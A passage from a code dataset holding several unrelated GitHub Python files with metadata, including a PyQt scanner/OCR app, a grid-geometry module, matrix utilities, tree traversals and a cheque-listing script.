yellow\")\n self.ui.btnStartscan.setText(\"Starting...\")\n\n if status == \"running\":\n self.ui.btnStartscan.setStyleSheet(\"background-color: red\")\n self.ui.btnStartscan.setText(\"Stop\")\n self.statusBar().showMessage(\"Scan job is running..\")\n \n if status == \"stopped\":\n self.ui.btnStartscan.setText(\"Sart Scan\")\n self.ui.btnStartscan.setStyleSheet(self.btnStyle)\n\n\n def ocr_StrartDlg(self):\n ocr_dlg = QMessageBox()\n ocr_dlg.setText(\"Start OCR-Process?\")\n ocr_dlg.setInformativeText(\"Create a searchable PDF-Document or stay with images only\")\n ocr_dlg.setStandardButtons(QMessageBox.Yes | QMessageBox.No);\n ocr_dlg.setDefaultButton(QMessageBox.Yes)\n ocr_dlg.setIcon(QMessageBox.Question)\n ret = ocr_dlg.exec()\n\n if ret 
        if ret == QMessageBox.Yes:\n            self.ocr_startProcess()\n\n    def ocr_startProcess(self):\n        self.progressDlg = QProgressDialog(self)\n\n        self.progressDlg.setWindowTitle(\"OCR Process\")\n        self.progressDlg.setLabelText(\"OCR Process in Progress ...\")\n        self.progressDlg.setAutoClose(False)\n        self.progressDlg.setAutoReset(False)\n        self.progressDlg.setModal(True)\n\n        self.startThread(self.ocr_process, None, self.ocr_stopped)\n\n    def gamma_table(self, gamma_r, gamma_g, gamma_b, gain_r=1.0, gain_g=1.0, gain_b=1.0):\n        # Build a 768-entry lookup table (256 values per RGB channel) that maps\n        # each input intensity x to its gamma-corrected output, clamped to 255.\n        r_tbl = [min(255, int((x / 255.) ** (1. / gamma_r) * gain_r * 255.)) for x in range(256)]\n        g_tbl = [min(255, int((x / 255.) ** (1. / gamma_g) * gain_g * 255.)) for x in range(256)]\n        b_tbl = [min(255, int((x / 255.) ** (1. / gamma_b) * gain_b * 255.)) for x in range(256)]\n\n        return r_tbl + g_tbl + b_tbl\n\n    def ocr_process(self):\n\n        if len(self.ocrFiles) > 0:\n\n            self.tempocr = tempfile.NamedTemporaryFile(delete=False)\n\n            val = 0\n            ### add one more step for the pdf create process\n            max_val = len(self.ocrFiles) + 1\n            self.progressDlg.setRange(0, max_val)\n\n            for f in self.ocrFiles:\n                val += 1\n                self.tempocr.write(str(f+\"\\n\").encode())\n\n                self.progressDlg.setValue(val)\n\n                #TODO: only if the option is checked\n                #NOTE: this is crop and resize in one step;\n                # size and dpi are predefined to A4 at 300 dpi\n                print(self.cropSize)\n                if self.cropSize['width'] > 1:\n                    ocrt.crop_resize(f, self.cropSize[\"left\"], self.cropSize[\"top\"], self.cropSize[\"width\"], self.cropSize[\"height\"])\n                #TODO: only if the option is checked\n                ocrt.check_orientation(f)\n                #TODO: only if the option is checked\n                ocrt.deskew(f)\n\n            self.tempocr.close()\n\n            print(self.tempocr.name)\n            ## str.removesuffix works in Python 3.9+\n            pdfname = self.ocrFiles[0].removesuffix(\"_1.png\")\n            #pdfname, suff = self.ocrFiles[0].rsplit(\"_1.png\")\n            # print(pdfname)\n            ### this runs in its own process\n            self.progressDlg.setLabelText(\"OCR Process finishing ...\")\n            ocrt.create_pdf(self.tempocr.name, pdfname)\n            ####\n            ## Workaround to get a correctly finished process,\n            ## since pytesseract uses subprocess, which cannot be handled in this thread\n            ####\n            while not os.path.isfile(pdfname+\".pdf\"):\n                time.sleep(3)\n            self.progressDlg.setValue(val+1)\n            os.unlink(self.tempocr.name)\n            self.ocrFiles.clear()\n        else:\n            return\n\n    def ocr_stopped(self):\n        print(\"OCR finished\")\n        self.statusBar().showMessage(\"OCR finished\")\n        self.progressDlg.close()\n        self.ui.btnOcr.setEnabled(False)\n\n    def ocr2pdf(self):\n        fileDlg = QFileDialog(self)\n        fileDlg.setNameFilter(\"Images (*.png *.jpg)\")\n        fileDlg.setFileMode(QFileDialog.FileMode.ExistingFiles)\n        fileDlg.setOption(QFileDialog.DontUseNativeDialog)\n\n        if fileDlg.exec():\n            self.ocrFiles = fileDlg.selectedFiles()\n            self.ocr_startProcess()\n\n    def configScan(self):\n        pixmap = QPixmap()\n        self.dev.resolution = int(self.ui.resolutions.currentText())\n        self.dev.mode = self.checkScanMode()\n        self.dev.start()\n        im = self.dev.snap()\n\n        convertImg = io.BytesIO()\n        im.save(convertImg, \"BMP\")\n        pixmap.loadFromData(convertImg.getvalue(), \"BMP\")\n        self.configWin.pixmapItem.setPixmap(pixmap)\n\n        #self.configWin.pixmapItem.setPixmap(QPixmap.fromImage(pix))\n        self.configWin.ui.view.fitInView(self.configWin.pixmapItem, Qt.KeepAspectRatio)\n        self.configWin.pixmapItem.grabMouse()\n        self.configWin.setBufferImage()\n        self.configWin.enhanceImage()\n        #im = None\n\n    @pyqtSlot()\n    def saveConfig(self):\n        self.brightness = self.configWin.ui.brigthnessLcd.value()\n        self.contrast = self.configWin.ui.contrastLcd.value()\n        self.color = self.configWin.ui.colorLcd.value()\n        self.sharpness = 
self.configWin.ui.sharpnessLcd.value()\n self.gamma = self.configWin.ui.gammaLcd.value()\n self.crop = self.configWin.ui.checkCrop.isChecked()\n self.cropSize['left'] = self.configWin.ui.cropX.value()\n self.cropSize['top'] = self.configWin.ui.cropY.value()\n self.cropSize['width'] = self.configWin.ui.cropW.value()\n self.cropSize['height'] = self.configWin.ui.cropH.value()\n\n group = self.configWin.ui.profileSelect.currentText()\n\n if group == \"default\":\n group = \"\"\n\n self.settings.setValue('defaultGroup',group)\n\n self.settings.beginGroup(group)\n\n self.settings.setValue('brightness',self.brightness)\n self.settings.setValue('contrast',self.contrast)\n self.settings.setValue('color',self.color)\n self.settings.setValue('sharpness',self.sharpness)\n self.settings.setValue('gamma',self.gamma)\n self.settings.setValue('ocr', self.ocr)\n self.settings.setValue('crop', self.crop)\n self.settings.setValue('cropSize',self.cropSize)\n #self.settings.setValue(\"path\",self.scanPath)\n self.settings.sync()\n self.settings.endGroup()\n self.configWin.close()\n\n @pyqtSlot(int)\n def ocrConfig(self,state):\n if state == Qt.Checked:\n self.ocr = True\n self.configWin.ui.OCR_Box.setEnabled(True)\n else:\n self.ocr = False\n self.configWin.ui.OCR_Box.setEnabled(False)\n\n\n def closeEvent(self,e):\n if self.tempocr is not None:\n if os.path.exists(self.tempocr.name):\n os.unlink(self.tempocr.name)\n if self.configWin is not None:\n if self.configWin.isVisible():\n self.configWin.close()\n\n\n e.accept()\ndef main():\n\n app = QApplication(sys.argv)\n window = MainWindow()\n window.scanners()\n \n #window.show()\n \n sys.exit(app.exec())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AlfredoCubitos/Scan2Folder","sub_path":"scan2folder.py","file_name":"scan2folder.py","file_ext":"py","file_size_in_byte":25847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"34757595892","text":"class Solution:\n def convert(self, s: str, numRows: int) -> str:\n rows = {}\n chars = list(s)\n \n while chars:\n for i in range(numRows):\n if chars:\n rows[i] = rows.get(i, \"\") + chars.pop(0)\n for i in range(numRows-2, 0, -1):\n if chars:\n rows[i] = rows.get(i, \"\") + chars.pop(0)\n \n zigzag = \"\"\n for line in rows.values():\n zigzag += line\n \n return zigzag ","repo_name":"hrand1005/leetcode","sub_path":"0006-zigzag-conversion/0006-zigzag-conversion.py","file_name":"0006-zigzag-conversion.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23708202914","text":"import abjad\nimport abjadext.nauert\n\n\ndef make_music_notation(pitches=60, durs=0.333, tempo=60, time_signature=(4,4)):\n \"\"\"Quick and simple music notation with Abjad.\n\n Converts pitch and duration values into music notation. Uses the Abjad\n quantizer.\n \n Parameters\n ----------\n pitches : list or scalar\n List of pitches, or scalar if constant pitch. Floating point values are\n interpreted as microtonal pitch deviations.\n durs: list or scalar\n List of durations, or scalar if constant duration. 
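        (Illustrative example; the literal values below are invented here, not\n        taken from any Abjad documentation:\n\n        >>> make_music_notation([60, 62, 64.5], [0.5, 0.25, 1.0])  # doctest: +SKIP\n\n        engraves three notes, the last a quarter-tone-sharp E, while a scalar\n        call such as make_music_notation(60, 0.333) yields a single note.)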
\n tempo: number\n Quarter note tempo mark.\n time_signature : tuple\n Musical time signature: (beats per measure, which note gets the beat).\n\n Returns\n -------\n abjadext.ipython display \n\n Notes\n -----\n If len(pitches) and len(durs) do not match, the smaller list is extended to \n match the length of the longer list by repeating the last value.\n\n Requires ipython ``%load_ext abjadext.ipython`` for display\n \"\"\"\n\n # check and convert to list if needed\n pitches = pitches if isinstance(pitches, list) else [pitches]\n durs = durs if isinstance(durs, list) else [durs]\n \n # extend short lists if size mismatch\n max_length = max(len(pitches), len(durs))\n pitches += [pitches[-1]] * (max_length - len(pitches))\n durs += [durs[-1]] * (max_length - len(durs))\n\n # offset pitches to C4 = 60\n pitches = [p - 60 for p in pitches]\n\n # scale durations to milliseconds\n durs = [d * 1000.0 for d in durs]\n \n # construct schema from tempo and time signature\n q_schema = abjadext.nauert.MeasurewiseQSchema(\n tempo=abjad.MetronomeMark((1, 4), tempo),\n time_signature=abjad.TimeSignature(time_signature),\n use_full_measure=True,\n )\n\n # sequence to be quantized\n q_event_seq = abjadext.nauert.QEventSequence.from_millisecond_pitch_pairs(tuple(zip(durs, pitches)))\n\n # quantize\n quantizer = abjadext.nauert.Quantizer()\n result = quantizer(q_event_seq, q_schema=q_schema)\n\n # stuff staff and score\n staff = abjad.Staff([result])\n score = abjad.Score([staff])\n\n # show\n return abjad.show(score)\n","repo_name":"davidkant/mai","sub_path":"mai/notation.py","file_name":"notation.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"38"} +{"seq_id":"33365983487","text":"# -*- coding: utf-8 -*-\n\"\"\"\nContains abstractions and implementations of a grid structure.\n\nCreated on Wed Jun 25 13:33:34 2014\n\n@author: schackv\n\"\"\"\nimport numpy as np\nfrom scipy.spatial import Delaunay\nfrom scipy.linalg import norm\nfrom scipy import sparse\nimport itertools\nfrom . 
import graphtools, misc\nimport networkx as nx\nimport logging\n\nclass Grid:\n \"\"\"Defines a Grid base class, consisting of a set of points and a set\n of functions to manipulate these points.\n \n The neighborhood data structure is using the networkx.Graph class.\"\"\"\n \n def __init__(self, xy,edges=[]):\n self.graph = nx.Graph()\n self.xy = xy\n for id, pos in enumerate(xy):\n self.graph.add_node(id,xy=pos)\n self.graph.add_edges_from(edges) \n \n @classmethod\n def from_textfile(cls, filename):\n \"\"\"Grid constructor based on files.\"\"\"\n xy = np.loadtxt(filename + '.points')\n edgelist = nx.read_edgelist(filename + '.edgelist',nodetype=int)\n return cls(xy,edgelist.edges())\n\n def write(self, filename):\n \"\"\"Write the grid to .point and .edgelist files.\"\"\"\n nx.write_edgelist(self.graph,filename + '.edgelist', data=False)\n np.savetxt(filename + '.points',self.xy)\n \n def resolve_edges(self):\n raise NotImplementedError()\n \n\n def edges(self):\n return self.graph.edges() \n \n def edge_lengths(self,scale_xy=None):\n if self.graph.number_of_nodes()==0 or self.graph.number_of_edges()==0:\n raise NoEdgesException()\n \n if scale_xy is None:\n scale_xy = (1,1)\n\n edge_lengths = [misc.weucl(self.graph.node[edge[0]]['xy'], self.graph.node[edge[1]]['xy'],scale_xy) for edge in self.graph.edges_iter()]\n# bondlengths_px = [norm(self.atoms[edge[0],:]-self.atoms[edge[1],:]) for edge in self.atom_edges]\n return np.array(edge_lengths)\n\n def edge_orientations(self):\n \"\"\"Return the orientations of each edge in radians.\"\"\"\n thetas = [misc.orientation(self.graph.node[edge[0]]['xy'], self.graph.node[edge[1]]['xy']) for edge in self.graph.edges_iter()]\n return thetas\n \n def edge_lengths_by_orientation(self, scale_xy=None, num_orientations=3, theta0 = np.pi/6):\n \"\"\"Get the edge lengths binned into num_orientations bins. 
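        (For example, with the defaults num_orientations=3 and theta0=pi/6, an\n        edge oriented at 35 degrees and one at 215 degrees fall into the same\n        bin, because orientation is taken modulo pi over the half-circle.)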
\n The bins are equidistantly spaced from theta0 up til theta0+pi\n \n Returns bin_centers, oriented_lengths (num_orientations-tuple)\n \"\"\"\n\n orientations = self.edge_orientations()\n lengths = self.edge_lengths(scale_xy=scale_xy)\n bin_centers, bin_idx = misc.circular_binning(orientations,half_circle=True,nbins=num_orientations*2, theta0=theta0)\n \n oriented_lengths = []\n for b, bin_center in enumerate(bin_centers):\n oriented_lengths.append(np.array([x for (x,idx) in zip(lengths,bin_idx) if idx==b]))\n \n return bin_centers, oriented_lengths\n \n \"\"\" Add zero-mean Gaussian random noise to the grid points \"\"\"\n def add_noise(self,noise_std):\n self.xy += np.random.randn(self.xy.shape[0],2)*noise_std\n# for n, attr in self.graph.nodes_iter(data=True):\n# attr['xy'] += np.random.randn(2)*noise_std\n\n def rotate(self,theta):\n self.xy = rotate_grid(self.xy,theta)\n \n def translate(self,deltaxy):\n self.xy += deltaxy\n# for n, attr in self.graph.nodes_iter(data=True):\n# attr['xy'] += deltaxy\n\n def plot(self,color='b',linecolor='k',markersize=3):\n import matplotlib.pyplot as plt\n from matplotlib import collections as mc\n plt.plot(self.xy[:,0],self.xy[:,1],'.',color=color,ms=markersize)\n plt.gca().add_collection(mc.LineCollection(self.line_collection(),colors=linecolor))\n plt.axis('image')\n \n def plot_color(self, stretch_range=[0.127,0.157], scale_xy=None):\n import matplotlib.pyplot as plt\n from matplotlib import collections as mc\n linergb = misc.color_range(self.edge_lengths(scale_xy=scale_xy), stretch_range)\n plt.gca().add_collection(mc.LineCollection(self.line_collection(),colors=linergb))\n plt.axis('image')\n\n def line_collection(self):\n return line_collection(self.xy,self.graph.edges())\n \n \n\nclass TriangularGrid(Grid):\n \"\"\" Implements a triangular grid structure.\n \"\"\"\n\n @classmethod\n def from_simplices(cls, xy, simplices):\n edges = graphtools.tri_edges(simplices)\n g1 = cls(xy,edges)\n g1.simplices = simplices\n return g1\n\n def delaunay_triangulate(self):\n \"\"\" Resolve the edges in the current grid leveraging the Delaunay \n triangulation. 
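        A standalone sketch (illustrative only; it mirrors what graphtools.tri_edges\n        presumably computes from the simplex array):\n\n        >>> import numpy as np\n        >>> from scipy.spatial import Delaunay\n        >>> dt = Delaunay(np.random.rand(20, 2))\n        >>> edges = {tuple(sorted(p)) for s in dt.simplices\n        ...          for p in ((s[0], s[1]), (s[0], s[2]), (s[1], s[2]))}\n\n        Each triangle contributes its three sides, and duplicates collapse into\n        a unique edge set.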
Three values of method can be chosen:\n \"\"\"\n dt = Delaunay(self.xy)\n super().__init__(dt.points,graphtools.tri_edges(dt.simplices)) # init as new graph\n self.simplices = dt.simplices\n return self.edges()\n \n\nclass SimulatedTriangularGrid(TriangularGrid):\n \"\"\"Represents a triangular grid with a given number of rows and columns.\n \n Inherits TriangularGrid.\n \"\"\"\n def __init__(self, rows,cols, t):\n self.t = t # Hexagonal side length\n # Generate centers\n xy = []\n for i in range(rows):\n for j in range(cols):\n xy.append(center_position(i,j,t))\n xy = np.vstack(xy)\n super().__init__(xy)\n \n def resolve_edges(self,remove_long=True):\n super().delaunay_triangulate()\n \n if remove_long:\n # TODO Also remove simplices!\n # Remove too long edges\n lengths = self.edge_lengths()\n idx = lengths > 1.1*np.sqrt(3)*self.t # Edges to remove\n \n \n E = self.graph.edges()\n# [logging.debug(E[i]) for i in np.where(idx)[0]]\n for i in np.where(idx)[0]:\n self.graph.remove_edge(*E[i]) # Remove edge\n \n \n \n \nclass HexagonalGrid(Grid):\n \n \n def _simplex_to_arc_nbhood(simplices):\n \"\"\"Get the simplex-to-arc adjacency matrix as a sparse matrix.\n Input is an iterable of simplices.\n \n This is not pretty, but fairly rapid.\"\"\"\n \n edges = graphtools.tri_edges(simplices)\n\n tri_edges = np.sort(edges,axis=1) # Node with lowest id is first\n simplex_ids = [] # Simplex ids\n edge_ids = [] # Edge ids for each simplex\n for sid, s in enumerate(simplices):\n s_edges = np.sort([[s[0], s[1]], [s[0], s[2]], [s[1], s[2]]],axis=1) # Edges in triangle\n aux = [np.nonzero((tri_edges[:,0]==edge[0]) & (tri_edges[:,1]==edge[1]))[0] for edge in s_edges] # Find edge-ids in this particular simplex\n \n edge_ids.append(np.hstack(aux)) # Put in a list\n simplex_ids.append(np.ones(len(aux))*sid)\n simplex_ids = np.hstack(simplex_ids)\n edge_ids = np.hstack(edge_ids)\n \n # Return as sparse matrix\n Ns = len(simplices)\n Ne = len(edges)\n simplex_to_arc = sparse.csc_matrix((np.ones(len(simplex_ids)),np.vstack((simplex_ids,edge_ids))),shape=(Ns,Ne))\n return simplex_to_arc\n \n @classmethod\n def from_triangular(cls,triGrid):\n \"\"\"Create a hexagonal grid based on its dual, triangular, grid.\n Points are positioned as centers of each simplex.\n \"\"\"\n \n \n Ne = triGrid.graph.number_of_edges()\n if Ne==0:\n raise NoEdgesException()\n \n logging.debug('Constructing hexagonal grid from triangular ({} edges).'.format(Ne))\n\n # Get simplex-to-arc neighborhood as sparse matrix\n simplex_to_arc = HexagonalGrid._simplex_to_arc_nbhood(triGrid.simplices)\n \n # Use simplex-to-arc neighborhood to get simplex-to-simplex\n simplex_to_simplex = []\n for eid in range(Ne):\n aux = simplex_to_arc[:,eid].nonzero()[0]\n # Get length-2 combinations (i.e. 
pairs of simplices)\n [simplex_to_simplex.append(comb) for comb in itertools.combinations(aux, 2)]\n simplex_to_simplex = np.array(simplex_to_simplex)\n\n # Get simplex-centers \n xy = []\n for s in triGrid.simplices:\n center = np.mean(triGrid.xy[s,:],axis=0)\n xy.append(center)\n xy = np.vstack(xy)\n\n obj = cls(xy,edges=simplex_to_simplex)\n# super().__init__(cls,xy=xy,edges=simplex_to_simplex)\n \n logging.debug('Hexagonal grid constructed with {} points'.format(obj.graph.number_of_nodes()))\n return obj\n \n\n \n \n \ndef line_collection(xy,edges):\n return np.dstack((xy[list(edges),0],xy[list(edges),1]))\n\n \n \n\"\"\" Get the position of the hexagon center at a given row and column idx\"\"\"\ndef center_position(row_idx,col_idx,t):\n x = 1.5* t*(1 + col_idx)\n y = tri_sidelength(t) * row_idx\n if col_idx % 2 == 0: # Even rows\n y += 0.5*tri_sidelength(t)\n else:\n y += tri_sidelength(t)\n \n return x, y\n \n\"\"\"Side length of triangles connecting centers of hexagons with side length t\"\"\"\ndef tri_sidelength(t):\n return np.sqrt(3)*t\n \n \n\"\"\" Rotate a set of points around their center \"\"\"\ndef rotate_grid(xy,theta):\n ctr = np.mean(xy,axis=0)\n R = np.matrix([[np.cos(theta),-np.sin(theta)],\n [np.sin(theta),np.cos(theta)]])\n\n xy_rotated = (xy-ctr) * R.T\n return np.array(xy_rotated + ctr) # readd center\n \n \nclass NoEdgesException(Exception):\n pass\n \n\n \n\n\n \n \n \n \n \n ","repo_name":"schackv/graphene","sub_path":"graphene/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":9734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"8590020872","text":"\"\"\"\nAll different kinds of Tree Traversal implemented iteratively\n\"\"\"\n\n\n\"\"\"\nPreOrder Traversal: Root, Left, Right\n\nAlgorithm:\n\n1) Create an empty stack nodeStack and push root node to stack.\n2) Do following while nodeStack is not empty.\n Pop an item from stack and print it.\n Push right child of popped item to stack\n Push left child of popped item to stack\n\nSince all the node is being visited exactly once therefore the time complexity is O(n)\n\nTime Complexity: O(n)\nSpace Complexity: O(n)\n\n\"\"\"\n\nclass Solution(object):\n def preorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n \n if not root: return\n \n stack = [root]\n answer = []\n \n while stack:\n temp = stack.pop()\n answer.append(temp.val)\n \n if temp.right:\n stack.append(temp.right)\n \n if temp.left:\n stack.append(temp.left)\n \n return answer\n\n\"\"\"\nInOrder Traversal: Left, Root, Right\n\n\nSince all the node is being visited exactly once therefore the time complexity is O(n)\n\nTime Complexity: O(n)\nSpace Complexity: O(n)\n\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\"\"\"\nPostOrder Traversal: Left, Right, Root\n\n\nSince all the node is being visited exactly once therefore the time complexity is O(n)\n\nTime Complexity: O(n)\nSpace Complexity: O(n)\n\n\"\"\"\n\n\n\n\"\"\"\nLevelOrder Traversal using DPS and PreOrder\n\nAlgorithm:\n\n\nSince all the node is being visited exactly once therefore the time complexity is O(n)\n\nAlgorithm:\n\nmantain a queue and initially add root to it.\n\nwhile queue is not null: perform the following steps:\n Take all elements from queue, add their values to res list.\n create list \"nextbatch\" of all children of nodes in queue\n reassign queue = nextbatch\n\nTime Complexity: O(n)\nSpace Complexity: O(n)\n\n\"\"\"\n\nclass Solution(object):\n def levelOrder(self, root):\n 
\"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n \n if not root: return []\n\n queue=[root]\n res= []\n \n while len(queue):\n nextbatch=[]\n res.append([node.val for node in queue if node is not None])\n for node in queue:\n if node:\n if node.left:\n nextbatch.append(node.left)\n if node.right:\n nextbatch.append(node.right)\n queue = nextbatch\n return res","repo_name":"mostofashakib/Applied-Algorithm","sub_path":"Leetcode/Python Solutions/Binary Trees/TreeTraversalIterative.py","file_name":"TreeTraversalIterative.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"71879040109","text":"def matrix_multiply(matrix1, matrix2):\n rows1, cols1 = len(matrix1), len(matrix1[0])\n rows2, cols2 = len(matrix2), len(matrix2[0])\n\n if cols1 != rows2:\n raise ValueError(\"Las dimensiones de las matrices no son compatibles para la multiplicación.\")\n\n result = [[0 for _ in range(cols2)] for _ in range(rows1)]\n\n for i in range(rows1):\n for j in range(cols2):\n for k in range(cols1):\n result[i][j] += matrix1[i][k] * matrix2[k][j]\n\n return result\n\ndef gauss_jordan(matrix):\n n = len(matrix)\n augmented_matrix = [row + [1 if i == j else 0 for j in range(n)] for i, row in enumerate(matrix)]\n\n for col in range(n):\n pivot_row = max(range(col, n), key=lambda i: abs(augmented_matrix[i][col]))\n augmented_matrix[col], augmented_matrix[pivot_row] = augmented_matrix[pivot_row], augmented_matrix[col]\n\n pivot_val = augmented_matrix[col][col]\n if pivot_val == 0:\n raise ValueError(\"La matriz no se puede invertir.\")\n\n for j in range(col, 2 * n):\n augmented_matrix[col][j] /= pivot_val\n\n for i in range(n):\n if i == col:\n continue\n factor = augmented_matrix[i][col]\n for j in range(col, 2 * n):\n augmented_matrix[i][j] -= factor * augmented_matrix[col][j]\n\n inverse_matrix = [row[n:] for row in augmented_matrix]\n return inverse_matrix\n\ndef cross_product(vector1, vector2):\n if len(vector1) != 3 or len(vector2) != 3:\n raise ValueError(\"Los vectores deben tener longitud 3 para calcular el producto vectorial.\")\n\n result = [\n vector1[1] * vector2[2] - vector1[2] * vector2[1],\n vector1[2] * vector2[0] - vector1[0] * vector2[2],\n vector1[0] * vector2[1] - vector1[1] * vector2[0]\n ]\n return result\n\ndef matrix_transpose(matrix):\n return [[matrix[j][i] for j in range(len(matrix))] for i in range(len(matrix[0]))]\n\ndef solve_linear_system(coeff_matrix, const_vector):\n n = len(coeff_matrix)\n\n # Transformar la matriz aumentada [coeff_matrix | const_vector]\n augmented_matrix = [coeff_matrix[i] + [const_vector[i]] for i in range(n)]\n\n # Eliminación gaussiana\n for col in range(n):\n if augmented_matrix[col][col] == 0:\n raise ValueError(\"El sistema no tiene solución única.\")\n\n for row in range(col + 1, n):\n factor = augmented_matrix[row][col] / augmented_matrix[col][col]\n for j in range(col, n + 1):\n augmented_matrix[row][j] -= factor * augmented_matrix[col][j]\n\n # Sustitución hacia atrás para encontrar las soluciones\n solutions = [0] * n\n for i in range(n - 1, -1, -1):\n if augmented_matrix[i][i] == 0:\n raise ValueError(\"El sistema no tiene solución única.\")\n\n solutions[i] = augmented_matrix[i][n] / augmented_matrix[i][i]\n for j in range(i):\n augmented_matrix[j][n] -= augmented_matrix[j][i] * solutions[i]\n\n return solutions\n\ndef matrix_determinant(matrix):\n n = len(matrix)\n\n if n == 1:\n return matrix[0][0]\n\n determinant = 0\n for i in 
range(n):\n submatrix = [row[:i] + row[i + 1:] for row in matrix[1:]]\n sign = (-1) ** i\n determinant += sign * matrix[0][i] * matrix_determinant(submatrix)\n\n return determinant\n \n ","repo_name":"R4fael-99/Tareas-Y-Proyectos","sub_path":"matrix_m2.py","file_name":"matrix_m2.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10563687380","text":"from funciones import *\n\nclearConsole()\nprint(\"\\n ******************* \")\nfile_name = str(input(\"Ingrese el nombre del archivo: \"))\nclearConsole()\n\nwhile True:\n print(\"\\n ******************* \")\n dni = str(input(\"Ingrese el DNI del usuario: \"))\n\n if dni.isnumeric() and (len(dni) == 7 or len(dni) == 8):\n clearConsole()\n break\n else:\n clearConsole()\n print(\"\\n ******************* \")\n print('Por favor, ingresa de nuevo \\nEl DNI debe tener entre 7 y 8 caracteres')\n\nprint(\"\\n ******************* \")\nwhile True:\n choose = int(input(\"Tipos de cheque: \\n1. Emitido\\n2. Depositado\\nSeleccione el tipo de cheque: \"))\n if choose == 1:\n check_type = \"EMITIDO\"\n break\n elif choose == 2:\n check_type = \"DEPOSITADO\"\n break\n else:\n clearConsole()\n print(\"\\n ******************* \")\n print('Elija la opcion correspondiente')\n print(\"\\n ******************* \")\n\nclearConsole()\nprint(\"\\n ******************* \")\ncheck_state_input = True if str(input(\"¿Desea selecionar un estado de cheque? S/N \")).upper() == \"S\" else False\nclearConsole()\nwhile True:\n if check_state_input:\n choose = int(input(\"Estados de cheque: \\n1. Pendiente\\n2. Aprobado\\n3. Rechazado\\nSeleccione un estado de cheque: \"))\n if choose == 1:\n check_state = 'PENDIENTE'\n clearConsole()\n break\n elif choose == 2:\n check_state = 'APROBADO'\n clearConsole()\n break\n elif choose == 3: \n check_state = 'RECHAZADO'\n clearConsole()\n break\n else:\n clearConsole()\n print(\"\\n ******************* \")\n print('Elija la opcion correspondiente')\n print(\"\\n ******************* \")\n\n else:\n check_state = ''\n break\n\n\nprint(\"\\n ******************* \")\ncheck_date_input = True if str(input(\"¿Desea seleccionar un rango de fecha? S/N \")).upper() == \"S\" else False\nclearConsole()\nif check_date_input:\n print(\"\\n ******************* \")\n check_date = str(input(\"Seleccione un rango de fecha\\n ******************* \\ndd-mm-aaaa:dd-mm-aaaa: \"))\n clearConsole()\nelse:\n check_date = ''\n\n\nprint(\"\\n ******************* \")\nwhile True:\n output_type = int(input(\"Tipos de salida: \\n1. Pantalla\\n2. 
CSV\\nSeleccione un tipo de salida: \"))\n if output_type == 1 or output_type == 2:\n clearConsole()\n break\n else:\n clearConsole()\n print(\"\\n ******************* \")\n print('Elija la opcion correspondiente')\n print(\"\\n ******************* \")\n\ndicc = csvToDicc(file_name)\ndicc_dni = diccFilter(dicc, 'DNI', dni)\ndicc_dni_type = diccFilter(dicc_dni, 'Tipo', check_type)\ndiccExist = dicc_dni_type #variable actualizada con los dicc filtrados existentes.\n\nif check_state:\n diccExist = diccFilter(diccExist, 'Estado', check_state)\n \n\n\nif check_type == \"EMITIDO\":\n if check_date:\n diccExist = time(diccExist, 'FechaOrigen', check_date)\n error = error(dicc_dni, 'NroCheque', 'NumeroCuentaOrigen')\nelif check_type == \"DEPOSITADO\":\n if check_date:\n diccExist = time(diccExist, 'FechaPago', check_date)\n error = error(dicc_dni, 'NroCheque', 'NumeroCuentaDestino')\n\nclearConsole()\nif error:\n print('Error: cheque duplicado en la cuenta\\nNo es posible visualizar datos.')\nelse:\n print(\"\\n ******************* \")\n print(\" Resultados \")\n print(\"\\n ******************* \")\n if output_type == 1:\n for key in diccExist:\n print(key, ' = ', diccExist[key])\n elif output_type == 2:\n name = getCsvName(diccExist, 'DNI')\n trimedDic = trimDic(diccExist, ['NroCheque', 'CodigoBanco', 'CodigoScurusal', 'DNI', 'Tipo', 'Estado'])\n diccToCsv(trimedDic, name)\n","repo_name":"pililongo/Homebanking_ITBA","sub_path":"Backend/Sprint_4/listado_cheques.py","file_name":"listado_cheques.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30738300113","text":"\"\"\"\nprogram for insertion and deletion in circular queue\n\nFront:Get the front item from queue.\nRear: Get the last item from queue.\nenqueue(value): This function is used to insert an element into the circular queue. \nIn a circular queue, the new element is always inserted at Rear position.\n\nSteps:\n\nCreate a new node dynamically and insert value into it.\nCheck if front==NULL, if it is true then front = rear = (newly created node)\nIf it is false then rear=(newly created node) and rear node always contains the address\nof the front node.\ndequeue(): This function is used to delete an element from the circular queue. \nIn a queue, the element is always deleted from front position.\n\nSteps:\n1)Check whether queue is empty or not means front == NULL.\n2)If it is empty then display Queue is empty.If queue is not empty then step 3\n3)Check if (front==rear) if it is true then set front = rear = NULL else move the front \nforward in queue, update address of front in rear node and return the element.\n\nTime Complexity: Time complexity of enQueue(), deQueue() operation is O(1) as there is \nno loop in any of the operation. \n\nIn case of linked list implementation, a queue can be easily implemented without \nbeing circular. However, in the case of array implementation, we need a circular queue \nto save space. 
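For example, an array-backed circular queue of capacity 5 advances the rear\nindex as rear = (rear + 1) % 5, so position 4 wraps around to 0 instead of\nforcing the array to grow; the linked implementation below gets the same\nwrap-around by keeping rear.link pointed at front.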
